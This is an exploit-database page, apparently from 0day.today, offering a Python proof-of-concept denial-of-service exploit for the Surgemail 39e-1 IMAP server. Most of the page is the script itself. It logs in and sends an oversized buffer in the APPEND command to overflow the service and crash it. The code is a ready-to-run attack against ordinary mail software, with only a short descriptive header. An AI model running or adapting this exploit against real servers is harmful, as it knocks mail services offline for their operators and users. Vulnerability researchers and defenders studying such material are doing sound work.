[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS

Author
Travis Warren
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6556
Category
dos / poc
Date add
29-06-2008
Platform
unsorted
=========================================================
Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS
=========================================================



#!/usr/bin/python
#
# Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS.
# Discovered by: Travis Warren
# 
# The IMAP service contains a buffer overflow in the APPEND command. 
# 
#


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = '\x41' * 3000

s.connect(('192.168.0.103',143))
s.recv(1024)
s.send('A001 LOGIN user@test.com user ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 APPEND ' + buffer + '\r\n')
s.recv(1024)
s.close()



#  0day.today [2024-12-25]  #